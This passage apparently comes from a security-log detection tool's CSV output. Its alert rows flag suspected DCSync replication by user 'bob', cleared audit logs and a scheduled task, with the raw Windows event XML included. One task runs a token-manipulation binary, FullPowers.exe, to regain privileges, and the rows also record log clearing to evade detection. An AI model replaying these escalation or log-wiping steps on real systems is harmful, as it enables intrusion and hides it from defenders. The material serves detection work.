9f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.022631,2019-03-26T01:28:45.022631+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242588 + + + + + Security + DC1.insecurebank.local + + + + + 2EA9670C-F0F9-4D3F-90E5-A087E8C05863 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +schedule task created,1583587059.98454,2020-03-07T17:17:39.984540+04:00,,Audit,High,schedule task created by user,4698," + + + + + 4698 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 282588 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + \FullPowersTask + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <URI>\FullPowersTask</URI> + </RegistrationInfo> + <Triggers /> + <Principals> + <Principal id="Author"> + <UserId>S-1-5-19</UserId> + <RunLevel>LeastPrivilege</RunLevel> + <RequiredPrivileges> + <Privilege>SeAssignPrimaryTokenPrivilege</Privilege> + <Privilege>SeAuditPrivilege</Privilege> + <Privilege>SeChangeNotifyPrivilege</Privilege> + <Privilege>SeCreateGlobalPrivilege</Privilege> + <Privilege>SeImpersonatePrivilege</Privilege> + <Privilege>SeIncreaseQuotaPrivilege</Privilege> + <Privilege>SeIncreaseWorkingSetPrivilege</Privilege> + </RequiredPrivileges> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> + <AllowHardTerminate>true</AllowHardTerminate> + <StartWhenAvailable>false</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <Duration>PT10M</Duration> + <WaitTimeout>PT1H</WaitTimeout> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>false</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>false</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> + <Priority>7</Priority> + </Settings> + <Actions Context="Author"> + <Exec> + <Command>C:\Users\Public\Tools\TokenManip\FullPowers.exe</Command> + <Arguments>-t 4932</Arguments> + </Exec> + </Actions> +</Task> + +",MSEDGEWIN10,Security +Audit log cleared,1651380018.084003,2022-05-01T08:40:18.084003+04:00,,Audit,Critical,Audit log cleared by user ( admin ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 21365 + + + + + Security + wind10.winlab.local + + + + + + S-1-5-21-482804190-775995292-3801157738-1002 + admin + WIND10 + 0x47ea55 + + +",wind10.winlab.local,Security +Audit log cleared,1553038508.786016,2019-03-20T03:35:08.786016+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 452811 + + + + + Security + PC01.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x17dad + + +",PC01.example.corp,Security +Audit log cleared,1553549315.405631,2019-03-26T01:28:35.405631+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 198242566 + + + + + Security + DC1.insecurebank.local + + + + + + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x8d7099 + + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242602 + + + + + Security + DC1.insecurebank.local + + + + + 98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Audit log cleared,1573805956.102509,2019-11-15T12:19:16.102509+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 25048 + + + + + Security + alice.insecurebank.local + + + + + + S-1-5-21-1005675359-741490361-30848483-1108 + bob + insecurebank + 0x1c363a4 + + +",alice.insecurebank.local,Security +Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242601 + + + + + Security + DC1.insecurebank.local + + + + + 8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242600 + + + + + Security + DC1.insecurebank.local + + + + + 8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c